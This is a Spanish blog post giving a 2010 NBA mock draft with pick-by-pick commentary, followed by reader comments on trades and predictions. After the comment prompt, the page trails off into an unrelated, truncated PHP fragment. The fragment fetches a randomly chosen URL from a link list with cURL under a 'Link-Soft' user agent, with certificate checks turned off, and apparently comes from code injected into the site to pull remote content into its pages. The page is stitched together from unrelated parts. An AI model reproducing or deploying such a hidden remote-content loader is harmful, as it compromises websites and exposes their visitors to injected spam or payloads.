Final Mock Draft 2010

23 de June de 2010 por txusma

Kantonyo me ha encomendado la difícil misión de preparar el último mock antes del draft que se celebrará la noche del 24 al 25 de Junio. Veamos que podemos hacer. Ya os aviso que no me veo capaz de completar toda la primera ronda:

1. Washington Wizards – John Wall: A estas alturas posiblemente John Wall sea el mejor jugador del draft y ni siquiera las dudas de como podría compenetrarse con Gilbert Arenas evitarán que vista de azul la próxima campaña.

2. Philadelphia 76ers – Evan Turner: Todo el mundo sitúa a Turner en el número 2 aunque posiblemente a Philadelphia le vendría mejor un jugador interior como Demarcus Cousins o Derrick Favors. La llegada del de Ohio State podría suponer la salida de Andrea Iguodala.

3. New Jersey Nets – Derrick Favors: Hasta hace bien poco la elección de los Nets estaba entre Favors y Cousins. El de Georgia Tech parecía ser el escogido al compenetrarse mejor con Brook Lopez ya que se trata de un PF con muy buenos movimientos ofensivos y mucho margen de progresión pero en las últimas horas la opción de Wesley Johnson parece tomar fuerza. Los Nets se han fijado en Carlos Boozer en el mercado de agentes libres y en esta conjetura Johnson casaría mucho mejor. Además comparten agente. De todas maneras yo sigo apostando por Favors.

4. Minnessota Timberwolves – Wesley Johnson: Sin duda la elección más lógica para los Wolves aunque la continuidad de la pareja Jefferson-Love está en el aire. Wesley Johnson está preparado para aportar ya mismo.

5. Sacramento Kings – Demarcus Cousins: Sin duda Cousins es el mejor jugador interior de este draft y posiblemente sin los problemas de madurez que se le achacan podría estar en la lucha por la primera posición. Puede convertirse en un jugador muy grande o ser una de las mayores decepciones de la historia. En los Kings dispondrá de un año para mejorar al lado de Dalembert y ocupar su puesto en cuanto este abandone el equipo al acabar la temporada.

6. Golden State Warriors – Greg Monroe: Los Warriors necesitan un jugador interior como el comer y a pesar de que Monroe no ha cuajado unos grandes workouts se supone que es de lo mejor que queda. Evidentemente, si Favors o Cousins llegan a este elección, los Warriors no se lo pensarían ni un segundo. De todas maneras tampoco es descartable que se decanten por Ekpe Udoh que ha causado una mejor impresión.

7. Detroit Pistons – Cole Aldrich: Los Pistons también necesitarían reforzar el juego interior y en este punto la duda surge entre Aldridge y Ed Davis. Creo que se decantarán por el primero, un jugador muy sólido y bastante bueno a ambos lados de la cancha.

8. Los Angeles Clippers – Luke Babbit: El jugador de Nevada ha subido como la espuma en los mocks conforme se iba acercando la fecha del draft. Parece ser que tanto Clippers como Jazz están encantados con él así que no caería más allá de la novena elección en caso de que los Clippers se decantaran finalmente por alguien como Aminu.

9. Utah Jazz – Xavier Henry: Empiezan las dudas serias. Como ya he comentado si llegara Babbit no habría dudas en St. Lake City pero si no llega habrá que pensárselo. Creo que dudarían entre Henry, Aminu y Davis y finalmente el primero sería el escogido. Es otro que llega perfectamente preparado para aportar desde el primer minuto y que puede desempeñar a la perfeccion un rol algo secundario aportando una buena defensa, tiro exterior y un carácter ganador.

10. Indiana Pacers – Al-Farouq Aminu: Lo que más les hace falta es un base pero a estar alturas no hay ninguno disponible así que nadie se extrañe si acaban traspasando su elección. Si se vieran obligados a escoger se lanzarían a lo mejor que quedara como sería en este caso el jugador de Wake Forest.

11. New Orleans Hornets – Ekpe Udoh: Otro de los jugadores que ha ido mejorando en los mocks aunque algunos le tachan de “viejo”. De hecho es el jugador de más edad que saldrá escogido este año. Udoh ha sido una de las sensaciones de la NCAA demostrando que puede llegar a ser algo más que un mero especialista defensivo.

12. Memphis Grizzlies – Paul George: De George dicen que puede ser un gran bluff o convertirse en el mejor jugador de aquí a 5 años, así que no será por potencial. Viendo la necesidad que tienen los Grizzlies de reforzar el juego exterior no parece una mala elección para ninguna de las dos partes.

13. Toronto Raptors – Ed Davis: El de North Carolina ha cuajado una temporada decepcionante y además ha estado lesionado en su última parte. De todas maneras tampoco nos debería sorprender ver como lo eligen los Pistons en la 7. Eso sí, si pasa de allí creo que caerá bastante. Con la marcha de Bosh, Toronto puede ser un buen destino para él.

14. Houston Rockets – Gordon Hayward: Posiblemente el jugador más mediático de la NCAA del año pasado con aquella gran actuación de Butler que a punto estuvo de llevarse el triunfo. Hayward ha hecho infinidad de workouts y parece haber convencido a los GM.

15. Milwaukee Bucks – Patrick Patterson: A Andrew Bogut le hace falta un complemento en la pintura y Patterson, un jugador muy serio y capaz de contribuir desde el primer minuto, podría acompañarle desde la posición de PF. El hecho de que lo hayan invitado a la Green Room también podría ser una buena señal.

16. Minnessota Timberwolves – Avery Bradley: Segunda elección para los Wolves y tras apuntalar la posición de alero con Wesley Johnson que mejor que un jugón como Avery Bradley. Lo comparan con Monta Ellis así que ya os podéis hacer una idea: Buena defensa y un escolta ofensivamente muy bueno en cuerpo de base.

Comenta

13 comentarios a esta entrada

  1. Viva_Dirk dice:
    #1

    Para mi se equivocan en Phily si piensan que Turner e Iguodala son incompatibles, me parece un juego exterior tremendo, perfecto para dejar crecer a Holiday y capaz de suministrar balones a los interiores.

    Sobre el resto del mock, veo mas arriba a Anderson, concretamente en el Nº9. Tengo dudas con Cousins y no creo que sea un center.

      Citar

  2. CAMPO2 dice:
    #2

    Los nets han ofrecido su ronda y a quien quieran de su plantilla menos Lopez a cambio de chris Paul y de esta manera coger a lebron en la agencia libre

      Citar

  3. Txusma dice:
    #3

    Tb se habla de q los Clippers podrían traspasar la número 8 a Chicago a cambio de Deng y que los Pacers podrían hacer lo propio con la 10 a Utah con Maynor en el objetivo

      Citar

  4. Hynreck dice:
    #4

    Txus, yo que los Jazz aceptaba encantado, luego cuando los Pacers descubran que Maynor está en Ocklahoma que se pongan de acuerdo con los Thunder…. 😛

    En serio, Maynor molaria mazo en los Pacers

      Citar

  5. Txusma dice:
    #5

    Apuntadmela en mi cuenta de cagadas. Ya me extrañaba que los Jazz quisieran la 10 teniendo la 9. Evidentemente, el traspaso sería con los Thunder.

      Citar

  6. sergio dice:
    #6

    Trade entre Warriors y Bucks. Maggette por Charlie Bell y Gadzuric. El salario de Maggette puede parecer algo excesivo, pero me gusta bastante la plantilla para el año que viene que queda en Milwaukee a la espera de Drafts y agentes libres. Creo q tienen espacio salarial suficiente para intentar fichar a un ala-pivot de garantías. No una estrella pero si un especialista defensivo (preferiblemente joven para unirse a Jennings y Bogut). No se si es posible siquiera intentar la contratacion de alguno de los 3 grandes agentes libres para ese puesto: Bosh, Stoudamire y Boozer. De cualquier manera un equipo con Jennings, Maggette, Salmons, X, y Bogut debe aspirar a altas cotas (al estilo de unos Atlanta estos años o superior). Añadamos un banquillo con Delfino, Ilyasova y Mbah a Moute y tenemos un gran equipo. Si consiguiese ese point forward y consiguieran renovar a Kurt Thomas y Kurt Thomas (preferiblemente a la baja… aunq el primero tendra ofertas) aun mejor para ellos.

    LEmontus me extraña que no venga a avisarnos de que el año que viene ganaran el anillo y esas cosas xD. Por cierto que seria una gran “putadinha” que Redd decidiera ampliar su contrato de 18 kilacos (es una player option). Por vergüenza torera espero q no lo haga.

      Citar

  7. sergio dice:
    #7

    Por cierto que los Heat han traspasado a Cook a cambio de un segunda ronda del Draft. Buscaran el “Big Three”? Yo apuesto por ello…

      Citar

  8. Hynreck dice:
    #8

    Que lista de cagadas Txus? Anda, que iba a saber yo en que equipo anda Maynor de no tenerle en la TJ… jajajajaj

      Citar

  9. Txusma dice:
    #9

    Bueno, aún recuerdo un comentario de Spanoulis que hice algún tiempo. Lo que perdió la NBA con su marcha!

      Citar

  10. Hynreck dice:
    #10

    Es verdad, no me acordaba de Spanoulis, ahí te luciste… los imbatibles Rockets del gran Spanoulis!!!

      Citar

  11. Txusma dice:
    #11

    Bueno, en realidad dije que los Spanoulis en los Spurs haría un buen papel cuando ya había firmado creo q por el CSKA… 😀

      Citar

  12. Hynreck dice:
    #12

    Bueno, yo le ofrecí un contrato a Keith Van Horn por 2 años y 2 millones cuando ya se había retirado… (Estas confesiones deberían estar precedidas de un : Hola soy Javier y soy alcoholico…)

      Citar

  13. D dice:
    #13

    Yo veo a Gordon Hayward en el número 10. Nacido en Indiana, y con una historia detrás de esas que tanto gustan en USA, creo que los Pacers se mojarán. A ver que pasa en 4 horas.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>